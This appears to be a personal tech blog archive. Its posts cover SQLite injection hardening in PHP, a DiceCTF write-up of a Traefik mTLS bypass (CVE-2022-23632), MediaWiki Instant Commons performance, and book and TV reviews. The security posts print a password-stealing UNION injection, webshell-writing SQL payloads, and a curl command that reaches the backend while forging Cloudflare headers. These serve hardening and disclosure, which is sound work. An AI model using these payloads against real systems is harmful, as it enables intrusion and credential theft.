Sunday, December 4, 2022

Hardening SQLite against injection in PHP

tl;dr: What are our options in PHP to stop SQLite from writing files when given malicious SQL queries, as a hardening measure against SQL injection?

 

One of the most famous web application security vulnerabilities is SQL injection.

This is where you have code like:

doQuery( "SELECT foo1, foo2 from bar where baz = '" . $_GET['fred'] . "';" );

The attacker goes to a url like ?fred='%20UNION%20ALL%20SELECT%20user%20'foo1',%20password%20'foo2'%20from%20users;--

The end result is: doQuery( "SELECT foo1, foo2 from bar where baz ='' UNION ALL SELECT user 'foo1', password 'foo2' from users ;-- ';" );

and the attacker has all your users' passwords. PortSwigger has a really good detailed explanation of how such attacks work.
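The standard first line of defence, of course, is to never build the query by string concatenation at all, and to use parameterized queries instead. A minimal sketch with PDO (the SQLite DSN path here is just a placeholder):

$pdo = new PDO('sqlite:/path/to/app.db'); // placeholder DSN
// The user-supplied value is bound as data and never parsed as SQL.
$stmt = $pdo->prepare('SELECT foo1, foo2 FROM bar WHERE baz = ?');
$stmt->execute([ $_GET['fred'] ]);
$rows = $stmt->fetchAll();

This post, though, is about hardening for the case where an injection slips through anyway.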

In addition to dumping all your private info, the usual next step is to try and get code execution. In a PHP environment, this often means getting your DB to write a PHP file in the web directory.

In MariaDB/MySQL this looks like:

SELECT '<?php system($_GET["c"]);?>' INTO OUTFILE "/var/www/html/w/foo.php";

Of course, in a properly set up system, permissions are such that mysqld/mariadbd does not have permission to write in the web directory, and the DB user does not have FILE privileges, so cannot use INTO OUTFILE.

In SQLite, the equivalent is to use the ATTACH command to create a new database (or VACUUM INTO). Thus the SQLite version of the attack is:

ATTACH DATABASE '/var/www/html/w/foo.php' AS foo; CREATE TABLE foo.bar (stuff text); INSERT INTO foo.bar VALUES( '<?php system($_GET["c"]);?>' );

This is harder than the MySQL case, since it involves multiple commands and you can't just add it as a suffix but have to inject as a prefix. It is very rare you would get this much control in an SQL injection.

Nonetheless it seems like the sort of thing we would want to disable in a web application, as a hardening best practice. After all, dynamically attaching multiple databases is rarely needed in this type of application.

Luckily, SQLite implements a feature called run-time limits. There are a number of limits you can set. The SQLite docs contain a list of suggestions for paranoid people at https://www.sqlite.org/security.html. In particular, there is SQLITE_LIMIT_ATTACHED, which you can set to 0 to disable attaching databases. There is also a more fine-grained authorizer API, which allows setting a permission callback to check things on a per-statement level.

Unfortunately PHP PDO-SQLITE supports neither of these things. It does set an authorizer if you have open_basedir on to prevent reading/writing outside the basedir, but it exposes no way that I can see for you to set them yourself. This seems really unfortunate. Paranoid people would want to set runtime limits. People who have special use-cases may even want to raise them. I really wish PDO-SQLITE supported setting these, perhaps as a driver specific connection option in the constructor.

On the bright side, if you are using the alternative sqlite3 extension instead of the PDO-SQLITE PHP extension, there is a solution. You still cannot set run-time limits, but you can set a custom authorizer:

$db = new SQLite3($dbFileName);
// Deny any ATTACH DATABASE statement (the target filename is passed as
// the second argument to the callback); allow everything else.
$db->setAuthorizer(function ( $action, $filename ) {
        return $action === SQLite3::ATTACH ? SQLite3::DENY : SQLite3::OK;
});

After this, if you try to do an ATTACH you get:

Warning: SQLite3::query(): Unable to prepare statement: 23, not authorized in /var/www/html/w/test.php on line 17

Thus success! No evil SQL can possibly write files.



Thursday, November 24, 2022

TV Show review: Stargate SGU


 If I could sum up this show in 2 words, I think it would be "wasted potential". There's a lot I really like about this show but the writers play it way too safe and it never really seems to come together into something truly interesting.

This was the third spin-off in the Stargate franchise, and if the original Stargate TV show is Star Trek: The Next Generation, and Atlantis is DS9, then this would be the franchise's Star Trek: Voyager.

And it has a very similar setup to Star Trek: Voyager: They get flung halfway across the universe and cannot get back. They aren't really prepared for the mission. There are enemies who (eventually) get stranded with them, whom they don't trust but nonetheless integrate into the crew.

The other show that seems an obvious influence would be Battlestar Galactica (BSG). I'd even go as far as to say that this show is essentially what would happen if Voyager and BSG had a baby that dressed up as Stargate for Halloween. You can especially see the BSG influence in where the drama of the show is focused. Voyager was very much alien-of-the-week. SGU focuses inwardly on its main cast and their struggles, in a more serialized fashion. The crew don't trust each other. There are cliques. They are stressed. They struggle with their emotions. The civilians and the military mistrust each other, just like in BSG. Additionally, BSG's Baltar was clearly an influence on how the lead scientist, Dr Rush, was depicted.

However, unlike BSG, this show doesn't really commit to being serialized, and as a result the characters never really grow. Any time something interesting happens to change the status quo, it gets reset in the next 2 or 3 episodes. For example, two of the characters' dead girlfriends get resurrected as computer programs in the ship - then 2 episodes later a contrived situation happens where they have to be "quarantined" in AI jail, never to be heard from or thought of again. Plots like this are common, where something happens that implies the characters will have to change and adapt, but just as you're excited to see how that plays out, the status quo ante is restored. Nothing ever seems permanent and you don't get the payoff for teased change. The worst example is probably Col. Telford, who switches from being obnoxious, to evil, to good, is marooned but comes back, is killed but then cloned in an alternate timeline, etc. The character gets swapped around so much it is simply ridiculous.

In many ways, one of the best plot lines in the show involves an alternate-timeline version of the crew being sent back a thousand years, and the main-timeline crew meeting their descendants and being shown archival footage of their alternate selves from a thousand years ago. This allowed the writers to show what might have been for these characters, and it was the most compelling character development in the show. I suppose the writers felt safer making bold choices with these alternate versions of the characters, since the real characters didn't necessarily need to abide by them. However, I can't help but think what a great show this would have been if this type of character development took place throughout.

Ultimately, this show felt like it didn't quite know what it wanted to be. It used patterns from both serialized and episodic TV shows, resulting in something a bit in-between which satisfied neither. It teased complex characters, but mostly failed to commit to actually developing them, instead playing things safe. Most frustrating of all, at times it did do interesting things, and you could see the potential. By the end, I really did like these characters, and wished I knew more about them. That is why I think "wasted potential" is the best descriptor for this show.





Sunday, September 11, 2022

Why don't we ever talk about volunteer PMs in open source?

 Recently, on Wikipedia, there was an open letter to the Wikimedia Foundation, asking them to improve the New Page Patrol feature.

This started the usual debate between "the WMF should do something" and "it is open source, {{sofixit}}" (i.e. send a patch). There are valid points on both sides of that debate, which I don't really want to get into.

However, it occurred to me - the people on the {{sofixit}} side always suggest that people should learn how to program (an unreasonable ask), figure out how to fix something, and do it themselves. On the other hand, in a corporate environment, stuff is never done solely by developers. You usually have either a product manager or a program manager organizing the work.

Instead of saying to users - learn PHP and submit a patch, why don't we say: Be the PM for the things you want done, so a programmer can easily just do them without getting bogged down with organizational questions?

At first glance this may sound crazy - after all, ordinary users have no authority. Being a PM is hard enough when people are paid to listen to you; how could it possibly work if nobody has to listen to you? And I agree - not everything a PM does is applicable here, but I think some things are.

Some things a volunteer person could potentially do:

  • Make sure that bugs are clearly described with requirements, so a developer could just do them instead of trying to figure out what the users need
  • Make sure tasks are broken down into appropriate sized tickets
  • Make a plan of what they wish would happen. A volunteer can't force people to follow their plan, but if you have a plan, people may just follow it. Too often all that is present is a big list of bugs of varying priority, from which it is hard for a developer to figure out what is important and what isn't
    • For example, what I mean is breaking things into a few milestones, and having each milestone contain a small number (3-5) of tickets around a similar theme. This could then be used to promote the project to volunteer developers, using language like "Help us achieve milestone 2", and to track progress. Perhaps even gamifying things.
    • No plan survives contact with the enemy of course, and the point isn't to stick to any plan religiously. The point is to have a short list of what the most pressing things to work on right now are. Half the battle is figuring out what to work on and what to work on first.
  • Coordinate with other groups as needed. Sometimes work might depend on other work other people have planned to do. Or perhaps the current work is dependent on someone else's requirements (e.g. new extensions require security review). Potentially a volunteer PM could help coordinate this or help ensure that everyone is on the same page about expectations and requirements.
  • [not sure about this one] Help find constructive code reviewers. In MediaWiki development, code must be reviewed by another developer to be merged in. Finding knowledgeable people can often be difficult and a lot of effort. Sometimes this comes down to personal relationships and politely nagging people until someone bites. For many developers this is a frustrating part of the software development process. It's not clear how productive a non-developer would be here, as you may need to understand the code to know who to talk to. Nonetheless, potentially this is something a non-programmer volunteer could help with.

To use the new page patrol feature as an example - users have a list of 56 feature requests. There's not really any indication of which ones are more important than others. A useful starting point would be to select the 3 most important. There are plenty of volunteer developers in the MediaWiki ecosystem who might work on them. The less time they have to spend figuring out what is wanted, the more likely they are to fix one of the things. There are no guarantees of course, but it is something someone who is not a programmer could do to move things forward.

 To be clear, being a good PM is a skill - all of this is hard and takes practice to be good at. People who have not done it before won't be good at it to begin with. But I think it is something we should talk about more, instead of the usual refrain of fix it yourself or be happy with what you got.


p.s. None of this should be taken as saying that WMF shouldn't fix anything and it should only be up to the communities, simply that there are things non-programmers could do to {{sofixit}} if they were so inclined.

 

Sunday, August 21, 2022

Weekly roundup - aug 21

Some things I read or saw this week that I thought were interesting.

Natural perspective


I found this blog post fascinating. Basically it talks about how human perception is different from what a photograph would capture. For example, if there is a big object of interest in the distance, it usually looks larger to the eye than it would in a photo. I never thought much about this before, but now that it has been pointed out to me, it rings very true.

Kill the hero save the (narrative) world


This was a talk from the GDC conference by Hannah Nicklin, who is the narrative lead of a video game called Mutazione, about the narrative structure of video games. Essentially the speaker was arguing that many video games follow a hero's journey type of plot, where the story follows a protagonist's journey to becoming a hero. They feel that this is a structure that works really well in movies: the director can direct your focus to character traits and growth, and the 2-hour length is also very suitable to developing a single character's journey. They argue that video games would be better suited to the structure of an ensemble-cast TV show. They think this allows a better balance between players being able to do whatever they want and still getting the plot across, as the focus is less on the effect of actions on the main character's psyche and more driven by characters interacting with a community of other characters.

I know very little about video games, so I don't know how true the premise rings. However, I found the reasoning quite interesting, and it gave me a lot to think about.

Galatea, Versu, Character Engine

This was a talk from 2018 by Emily Short about making non-playable characters in video games feel like real people with inner lives. She also talks a bit about the pros and cons of interactive fiction, which I have always found interesting.





Saturday, August 13, 2022

Book review: Reamde

 

 

It has been a while since I have read a Stephenson novel, so when I saw this 1044-page piece of light reading on the library shelf, I thought I would give it a go.

While I still enjoyed this novel, overall it was one of my least favourite Stephenson novels that I have read. I think perhaps the type of novel this was - essentially a thriller set in basically our current world - showcased Stephenson's weaknesses as a writer and hid his strengths.

Stephenson is pretty famous for writing giant novels, and this is no exception. However, usually it feels like a lot more is going on to justify the length. In this novel, the plot is much more straightforward, and instead of using the pages to explain complex concepts or explore the world, we instead get 150-page-long car/boat chases.

I think fundamentally the reason why Neal Stephenson novels are usually really fun is their setting. He essentially writes novels set in various nerd utopias. The difference between him and most other science fiction writers working in utopian settings is that most of those types of novels spend a lot of time arguing for the utopia or telling you how good it is. In Neal Stephenson novels, there is less of that, and the novel is more just set there. We might see how much a character likes the setting through their eyes, and how excited they are by it, but it still seems less directly aimed at the reader. I think this eases suspension of disbelief, because it feels less preachy and allows one to get absorbed in the "coolness" of the fantasy without thinking about all the ways it falls apart. For example, both Anathem and The Big U are romanticized versions of university life (albeit romanticized in opposite directions), Cryptonomicon is a romanticized version of the cypherpunk movement, and Snow Crash is kind of romanticized cyberpunk. [I read these a long time ago, I might not be remembering them that well]

In this novel, the only romanticized aspect is a world where everyone thinks MMORPGs are really cool. Unfortunately, a world where slightly more people play MMORPGs is a lame utopia.

Additionally it has very little to do with the plot. It does provide the inciting incident, where a ransomware computer virus infecting the MMORPG encrypts some mobsters' private files. However this felt arbitrary - the MMORPG aspect really didn't matter.

Even worse, we spend hundreds of pages on this MMORPG world and the ongoing re-alignment of the in-world factions (The so-called "War of realignment"). Just as it seems to be building to something, we cut away to the main plot, never bothering to resolve or revisit what was building. This is especially sad, because in a lot of ways, it was more interesting than the main plot. Instead it is relegated to being a rather trite metaphor for a theme in the main plot about people coming together to form a chosen tribe over whatever situations they were born into.

Perhaps that's the biggest disappointment in this book: the threads don't really come together to form something bigger. There are a bunch of interesting premises at various points that don't really seem to contribute much to the overall whole. There is the design of the MMORPG/War of Realignment, which is talked about a lot but doesn't really go anywhere. There are the motorcycle gangsters with katanas, who are introduced as back-story for a side character, who just ends up being shot with no katana fights. There are the main character's relatives, who are some sort of fundamentalist Christian gun-nut cult, but when the action comes down they mostly just hide in their house like normal people.

Why bother with all these tantalizing details when everyone in the end just acts like a normal person? Their uniqueness seems unnecessary to the novel, which feels like a major letdown.

Last of all, and pretty unrelatedly, the female characters felt like they were written weirdly, in a hard-to-define way. The main character, Zula, spent most of the novel kidnapped, and there was a bizarre amount of discussion of the differing levels of chivalry her various kidnappers showed her. As if holding the door open for her somehow makes up for the whole kidnapping at gunpoint. Several characters debate whether Yuxia is a "sister" or girlfriend material, where "friend" or "person they just met last week under very traumatic circumstances" apparently didn't cross anyone's mind. All the romantic pairings seemed kind of random and forced (except maybe Olivia & Sokolov). Yuxia had barely even exchanged any words with Seamus before the two were suddenly together. Csongor and Zula also had pretty limited interaction before falling in love.

In the end, I did enjoy it, but it is definitely not his strongest novel.

Wednesday, July 20, 2022

Interviewed on Between the brackets

This week I was interviewed by Yaron Koren for the second time for his MediaWiki podcast Between the Brackets.

Yaron has been doing this podcast for several years now, and I love how he highlights the different voices of all the different groups that use, interact with, and develop MediaWiki. He's had some fascinating people on his podcast over the years, and I highly recommend giving it a listen.

Anyhow, it's an honour to be on the program again for episode 117. I was previously on the program 4 years ago for episode 5.


Monday, July 18, 2022

Write up DiceCTF 2022: Flare and stumbling upon a Traefik 0-day (CVE-2022-23632)

A while back, I participated in DiceCTF. During the contest I was the first person to solve the problem "Flare".

This was pretty exciting. Normally I'm happy just to be able to solve a problem — I'm never first. Even better though, my solution wasn't the intended solution, and I had instead found a 0-day in the load balancing software the contest was using!

The contest was a while ago so this post is severely belated. Nonetheless, given how exciting this all was, I wanted to write it up.

The Problem

The contest problem was short and sweet. You had a Flask app behind Cloudflare. If you accessed it from an internal IP address (e.g. 192.168.0.2 or 10.0.0.2), you got the flag. The entire code is just 18 lines, mostly boilerplate:

import os
import ipaddress

from flask import Flask, request
from gevent.pywsgi import WSGIServer

app = Flask(__name__)
flag = os.getenv('FLAG', default='dice{flag}')

@app.route('/')
def index():
    ip = ipaddress.ip_address(request.headers.get('CF-Connecting-IP'))

    if isinstance(ip, ipaddress.IPv4Address) and ip.is_private:
        return flag

    return f'No flag for {format(ip)}'

WSGIServer(('', 8080), app).serve_forever()
  

Avenues of Attack

Simple to understand, but how to attack? The direct approach seems unlikely; the service is behind Cloudflare — if we can trick Cloudflare into thinking we are connecting to a site from an arbitrary IP address, then that would be a very significant vulnerability. If we could actually make a TCP connection to Cloudflare from an IP address that should not be globally routable, then something is seriously wrong with the internet.

Thinking about it, it seems like the following approaches are possible:

  • Hack Cloudflare to send the wrong CF-Connecting-IP header (Seems impossible)
  • Use some sort of HTTP smuggling or header normalization issue to send something that Flask thinks is a valid CF-Connecting-IP header, but Cloudflare doesn't recognize, and hope that when faced with 2 conflicting headers, Flask chooses ours instead of Cloudflare's. (Also seems impossible)
  • Find the backend server and connect to it directly, bypassing Cloudflare, allowing us to send whatever header we want


With that in mind, I figured it had to be the third one. After all, this is a challenge, so it must have a solution — hence it's probably neither impossible nor dependent on a high-value vulnerability in a major CDN.

I was wrong of course. The intended solution was sort of a combination of the first possibility, which I dismissed as impossible, and Python having an "interesting" definition of an "internal" IP, which there is no way I ever would have gotten. More on that later.

Trying to Find the Backend

So now that I had determined my course of action, I started hunting for the backend server. I tried googling around for snippets from the page to see if any other sites came up in Google with the same text. I tried looking at various "DNS history" sites, which were largely useless. I tried certificate transparency logs, but no. I even tried blindly typing in variations on the challenge's domain name.

The setup for the challenges was as follows: this challenge was on https://flare.mc.ax. The other challenges were all on *.mc.ax. This was the only challenge served by Cloudflare; the rest were served directly by the CTF infrastructure using a single IP address and a wildcard certificate.

With that in mind, I thought: maybe I could connect to the IP serving the other challenges, give the flare.mc.ax SNI and host header, and perhaps I would be directly connected to the backend. So I tried that, as well as the domain fronting version where you give the wrong SNI but the right host header. This did not work. However, to my surprise, instead of getting a 404 response, I got a 421 Misdirected Request.

421 essentially means you asked for something that this server is not configured to give you, so you should re-check your DNS resolution to make sure you have the right IP address and try again. In HTTP/2, you are allowed to reuse a connection for other domains as long as it served a TLS certificate that would work for the other domain (this is called "connection coalescing"). However, sometimes that backfires, especially with wildcard certs. Just because a server serves a TLS certificate for *.example.com doesn't mean it knows how to literally handle everything under example.com, since some subdomains might be served by a different server on a different IP. The new error code was created for such cases, to tell the browser it should stop with the connection coalescing, look up the DNS records for the domain name again, and open a separate connection. We needed a new code because if the server just responded with a 404, the browser wouldn't know if it's because the page just doesn't exist, or because the connection was inappropriately coalesced.

Looking back, I'm not sure I should have seen this as a sign. After all I was asking for a domain name that this server did not serve but had a correct certificate for, so this was the appropriate HTTP status code to give. However, the uniqueness of the error code and sudden change in behaviour around the domain name I was interested in, made me feel like I was on to something.

So I tried messing around with variations in headers and SNI. I tried silly things like having Host: flare.mc.ax/foo in the hope that it would maybe confuse one layer, but another layer would strip it off and get me the site I wanted, or something like that.

Why settle for partial qualification? 

Eventually I tried Host: flare.mc.ax. (note the extra dot at the end) with no SNI.

curl 'https://104.196.60.107'  -vk --header 'host: flare.mc.ax.' --http1.1 --header 'CF-Connecting-IP: 127.0.0.1' --header 'X-Forwarded-For: 127.0.0.1' --header 'CF-ray: REDACTED' --header 'CF-IPCountry: CA' --header 'CF-Visitor: {"scheme":"https"}' --header 'CDN-Loop: cloudflare'

It worked.

Wait what?

What does a dot at the end of a domain name even mean?

In DNS, there is the concept of a partially qualified domain name (PQDN), and its opposite, the fully qualified domain name (FQDN). A partially qualified domain name is similar to a relative path - you can set up a default DNS search path in your DNS config (usually set by DHCP) that acts as a default suffix for partially qualified domain names. For example, if your default search path is example.com and you look up the host foo, DNS will check foo.example.com.

I imagine this made more sense during the early internet, when it was more a "network of networks", and it was more common that you wanted to look up local resources on your local network.

In DNS, there is the root zone, which is represented by the empty string. This is the top of the DNS tree, which has TLDs like com or net, as its children.

If you add a period to the end of your DNS name, for example foo., this tells the DNS software that it isn't a partially qualified DNS name; what you actually want is to look up the foo domain in the root zone. So it does not look up foo.example.com., but instead just foo..

For the most part, this is an obscure bit of DNS trivia. However, as far as web browsers are concerned, the PQDN example.net and FQDN example.net. are entirely separate domains. The same origin policy treats them differently, cookies set to one do not affect the other (TLS certificates seem to work for both though). In the past, people have used this trick to avoid advertisers on some websites.

So why did this work?

So at this point, I solved the puzzle, obtained the flag and submitted it. Yay me!
 
But I still wasn't really sure what happened. I assumed there was some sort of misconfiguration involved, but I wasn't sure what. I did not have the configuration of the load-balancer. For that matter, I wasn't even sure yet which load balancing software was in use.

After I solved the problem, the competition organizers reached out and asked me what method I used. I imagine they wanted to see if I found the intended solution or stumbled upon something else. When I told them, they were very surprised. Apparently mutual TLS had been set up with Cloudflare, and it should have been impossible to contact the backend if you did not have the correct client certificate, which I did not.

Wait what!?

The load balancing software in question was Traefik. In it, you can configure various requirements for different hosts. For example, you can say that a certain host needs a specific version of TLS, specific ciphers, specific server certificate or even a specific client certificate (mTLS). There is also a section for default options. In this case, they had one set of TLS settings for most of the domains, and a rule for the flare domain that you needed the correct client certificate to get access.

In normal operation, the SNI is checked and the appropriate requirements are applied. In the event that the SNI doesn't match the host header, and the host header matches a domain with different TLS requirements than the default requirements, a 421 status code is sent. This is all good.

However, if the host header has a period at the end to make it a FQDN, the code checking the TLS requirements doesn't think it matches the non-period version, so only the default requirements apply. Meanwhile, the rest of the code will still forward the request to the correct domain and process it as normal.

Thus, you can bypass any domain specific security requirements by not sending the SNI and adding an extra period to the host header.

This would be one thing for settings like min TLS version. However, it is an entirely different thing for access control settings such as mutual TLS as it allows an attacker to fully bypass the required client certificate, getting access to things they shouldn't be able to.

I reported this to the Traefik maintainers, and they fixed the issue in version 2.6.1. It was assigned CVE-2022-23632 and you can read more about it in their advisory. This was pretty exciting as well, as Traefik is used by quite a few people, and based on their GitHub security advisory page, this is the first high-severity vulnerability that has been found in it.

What was the intended solution?

I found out later from the organizers of the CTF that the intended solution was something very different. I definitely would never have come up with this myself.

The intended solution was to exploit two weird behaviours:

  • The Python ipaddress library considers class E IP addresses (i.e. 240.0.0.0/4) to be "private". Class E addresses are reserved for future use. They are not globally routable, but they aren't private either, so it is odd that Python considers them private. Python's own docs say that is_private is "True if the address is allocated for private networks", linking to IANA's official list, even though 240.0.0.0/4 is not listed as private use on that list.
  • Cloudflare has a feature where, if your site does not support IPv6, you can enable "Pseudo IPv4", where IPv6 connections will be forwarded as if they come from a class E IPv4 address. Cloudflare talks more about it in their blog post.

Which is a pretty fascinating combination.

Initially I discarded the possibility that you could make Cloudflare give the wrong IP address, because I thought that would be such a major hack that it wouldn't show up in this type of contest; people would either be reporting it or exploiting it, depending on the colour of their hat. However, my assumption was based on the idea that any sort of exploit would let you pick your IP. Being able to present as a random class E address (the class E IP is based on an md5 hash of the top 64 bits of your IPv6 address, so you cannot choose it) is nowhere near as useful as being able to choose your IP (everyone is just so trusting of 127.0.0.1). While this is a fascinating challenge, it's hard to imagine a non-contrived situation where this would be a useful primitive. Real-world network access control that just blacklists all globally routable IPs instead of allowlisting your own network seems silly. Even sillier would be to whitelist class E for some reason. Sure, I guess an attacker could masquerade as one of these class E addresses to confuse anti-abuse systems, but if the site properly processes those connections, then anti-abuse systems are likely to handle them just as easily as a normal IP. Since it's still tied to your real IP, you can't hop between them unless you can hop between real IPs. If it ever really became an issue, Cloudflare lets you disable the feature, and there is also an additional header with the original IPv6 address you can use. At worst, maybe it makes reading logs after an incident more complicated, but this would be a really bad way to hide yourself in a world where VPNs are cheap and Tor is free. In conclusion - it's a fascinating behaviour, but practically speaking it doesn't seem exploitable in the way that "make Cloudflare report your IP is something other than your IP" sounds like it would be at first glance.

 

 

Tuesday, July 12, 2022

Making Instant Commons Quick

 The Wikimedia family of websites includes one known as Wikimedia Commons. Its mission is to collect and organize freely licensed media so that other people can re-use them. More pragmatically, it collects all the files needed by different language Wikipedias (and other Wikimedia projects) into one place.

 

The 2020 Wikimedia Commons Picture of the Year: Common Kingfisher by Luca Casale / CC BY SA 4.0

 As you can imagine, it's extremely useful to have a library of freely licensed photos that you can just use to illustrate your articles.

However, it is not just useful for people writing encyclopedias. It is also useful for any sort of project.

To take advantage of this, MediaWiki, the software that powers Wikipedia and friends, comes with a feature to use this collection on your own Wiki. It's an option you can select when installing the software and is quite popular. Alternatively, it can be manually configured via $wgUseInstantCommons or the more advanced $wgForeignFileRepos.

The Issue

Unfortunately, instant commons has a reputation for being rather slow. As a weekend project I thought I'd measure how slow, and see if I could make it faster.

How Slow?

First things first, I'll need a test page. Preferably something with a large (but not extreme) number of images but not much else. A Wikipedia list article sounded ideal. I ended up using the English Wikipedia article: List of Governors General of Canada (Long live the Queen!). This has 85 images and not much else, which seemed perfect for my purposes.

I took the expanded Wikitext from https://en.wikipedia.org/w/index.php?title=List_of_governors_general_of_Canada&oldid=1054426240&action=raw&templates=expand, pasted it into my test wiki with instant commons turned on in the default config.

And then I waited...

Then I waited some more...

1038.18761 seconds later (17 minutes, 18 seconds) I was able to view a beautiful list of all my viceroys.

Clearly that's pretty bad. 85 images is not a small number, but it is definitely not a huge number either. Imagine how long [[Comparison_of_European_road_signs]] would take with its 3643 images or [[List_of_paintings_by_Claude_Monet]] with 1676.

Why Slow?

This raises the obvious question of why it is so slow. What is it doing for all that time?

When MediaWiki turns wikitext into html, it reads through the text. When it hits an image, it stops reading through the wikitext and looks for that image. Potentially the image is cached, in which case it can go back to rendering the page right away. Otherwise, it has to actually find it. First it will check the local DB to see if the image is there. If not it will look at Foreign image repositories, such as Commons (if configured).

To see if Commons has the file, we need to start making some HTTPS requests¹:

  1. We make a metadata request to see if the file is there and get some information about it: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=timestamp%7Cuser%7Ccomment%7Curl%7Csize%7Csha1%7Cmetadata%7Cmime%7Cmediatype%7Cextmetadata&prop=imageinfo&iimetadataversion=2&iiextmetadatamultilang=1&format=json&action=query&redirects=true&uselang=en
  2.  We make an API request to find the url for the thumbnail of the size we need for the article. For commons, this is just to find the url, but on wikis with 404 thumbnail handling disabled, this is also needed to tell the wiki to generate the file we will need: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=300&iiurlheight=-1&iiurlparam=300px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en
  3.  Some devices now have very high resolution screens. Screen displays are made up of dots. High resolution screens have more dots per inch, and thus can display finer detail. Traditionally 1 pixel equalled one dot on the screen. However, if you keep that while increasing the dots-per-inch, suddenly everything on the screen that was measured in pixels is very small and hard to see. Thus these devices now sometimes have 1.5 dots per pixel, so they can display fine detail without shrinking everything. To take advantage of this, we use an image 1.5 times bigger than we normally would, so that when it is displayed at its normal size, we can take advantage of the extra dots and display a much clearer picture. Hence we need the same image but 1.5x bigger: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=450&iiurlheight=-1&iiurlparam=450px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en
  4. Similarly, some devices are even higher resolution and use 2 dots per pixel, so we also fetch an image double the normal size:  https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=600&iiurlheight=-1&iiurlparam=600px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en

 

This is the first problem - for every image we include, we have to make 4 API requests. If we have 85 images, that's 340 requests.

Latency and RTT

It gets worse. All of these requests are done in serial. Before doing request 2, we wait until we have the answer to request 1. Before doing request 3 we wait until we get the answer to request 2, and so on.

Internet speed can be measured in two ways - latency and bandwidth. Bandwidth is the usual measurement we're familiar with: how much data can be transferred in bulk - e.g. 10 Mbps.

Latency, ping time or round-trip-time (RTT) is another important measure - it's how long it takes your message to get somewhere and come back.

When we start to send many small messages in serial, latency starts to matter. How big your latency is depends on how close you are to the server you're talking to. For Wikimedia Commons, the data-centers (DCs) are located in San Francisco (ulsfo), Virginia (eqiad), Texas (codfw), Singapore (eqsin) and Amsterdam (esams). For example, I'm relatively close to SF, so my ping time to the SF servers is about 50ms. For someone with a 50ms ping time, all this back and forth will take at a minimum 17 seconds just from latency.

However, it gets worse; your computer doesn't just ask for the page and get a response back, it has to set up the connection first (TCP & TLS handshake). This takes additional round-trips.

Additionally, not all data centers are equal. The Virginia data center (eqiad)² is the main data center which can handle everything; the other DCs only have Varnish servers and can only handle cached requests. This makes browsing Wikipedia when logged out very speedy, but the type of API requests we are making here cannot be handled by these caching DCs³. For requests they can't handle, they have to ask the main DC what the answer is, which adds further latency. When I tried to measure mine, I got 255ms, but I didn't measure very rigorously, so I'm not fully confident in that number. In our particular case, the TLS & TCP handshake are handled by the closer DC, but the actual API response has to be fetched all the way from the DC in Virginia.

But wait, you might say: surely you only need to do the TLS & TCP setup once if communicating with the same host. And the answer would normally be yes, which brings us to major problem #2: each connection is set up and torn down independently, requiring us to re-establish the TCP/TLS session each time. This adds 2 additional RTTs per request. In our 85-image example, we're now up to 1020 round-trips. If you assume 50ms to the caching DC and 255ms to Virginia (these numbers are probably quite idealized; there are probably other things I'm not counting), we're up to 2 minutes.
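Roughly, the arithmetic behind those numbers (using the idealized latencies above) works out like this:

85 images × 4 requests = 340 requests
340 requests × 3 RTTs each (TCP + TLS 1.3 + the request itself) = 1020 round-trips
Per request: 2 × 50 ms of handshakes at the edge + 255 ms for the API response from Virginia ≈ 355 ms
340 requests × 355 ms ≈ 121 seconds ≈ 2 minutes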

To put it all together, here is a diagram representing all the back and forth communication needed just to use a single image:

12 RTT per image used! This is assuming TLS 1.3. Earlier versions of TLS would be even worse.

Introducing HTTP/2

In 2015, HTTP/2 came on the scene. This was the first major revision to the HTTP protocol in almost 20 years.

The primary purpose of this revision of HTTP was to minimize the effect of latency when you are requesting many separate small resources around the same time. It works by allowing a single connection to be reused for many requests at the same time and allowing the responses to come in out of order or jumbled together. In HTTP/1.1 you can sometimes be stuck waiting for some request to finish before being allowed to start on the next one (head-of-line blocking), resulting in inefficient use of network resources.

This is exactly the problem that instant commons was having.

Now I should be clear, instant commons wasn't using HTTP/1.1 in a very efficient way, and it would be possible to do much better even with HTTP/1.1. However, HTTP/2 will still be that much better than what an improved usage of HTTP/1.1 would be.

Changing instant commons to use HTTP/2 changed two things:

  1. Instead of creating a new connection each time, with multiple round trips to set up TCP and TLS, we just use a single HTTP/2 connection that only has to do the setup once.
  2. If we have multiple requests ready to go, send them all off at once instead of having to wait for each one to finish before sending the next one.

We still can't do all requests at once, since the MediaWiki parser is serial and stops parsing once it hits an image, so we need to get information about the current image before we know which one we will need next. However, this still helps, as for each image we send 4 requests (metadata, thumbnail, 1.5dpp thumbnail and 2dpp thumbnail), which we can now send in parallel.
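As an illustration of the idea (a hypothetical sketch, not the extension's actual code), this is roughly what sending the four per-image requests over a single multiplexed HTTP/2 connection looks like with PHP's curl_multi; $metadataUrl and friends stand in for the API URLs shown earlier, and curl needs to be built with HTTP/2 support:

$urls = [ $metadataUrl, $thumbUrl, $thumb15Url, $thumb2Url ];

$mh = curl_multi_init();
// Let curl multiplex several requests over one HTTP/2 connection.
curl_multi_setopt( $mh, CURLMOPT_PIPELINING, CURLPIPE_MULTIPLEX );

$handles = [];
foreach ( $urls as $url ) {
        $ch = curl_init( $url );
        curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
        curl_setopt( $ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_2_0 );
        curl_multi_add_handle( $mh, $ch );
        $handles[] = $ch;
}

// Run all transfers; they complete in parallel instead of one after another.
do {
        $status = curl_multi_exec( $mh, $active );
        if ( $active ) {
                curl_multi_select( $mh );
        }
} while ( $active && $status === CURLM_OK );

$responses = array_map( 'curl_multi_getcontent', $handles );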


The results are impressive for such a simple change. Where previously my test page took 17 minutes, now it only takes 2 (139 seconds).


Transform via 404

In vanilla MediaWiki, you have to request a specific thumbnail size before fetching it; otherwise it might not exist. This is not true on Wikimedia Commons. If you fetch a thumbnail that doesn't exist, Wikimedia Commons will automatically create it on the spot. MediaWiki calls this feature "TransformVia404".

In instant commons, we make requests to create thumbnails at the appropriate sizes. This is all pointless on a wiki where they will automatically be created on the first attempt to fetch them. We can just output <img> tags, and the first user to look at the page will trigger the thumbnail creation. Thus skipping 3 of the requests.
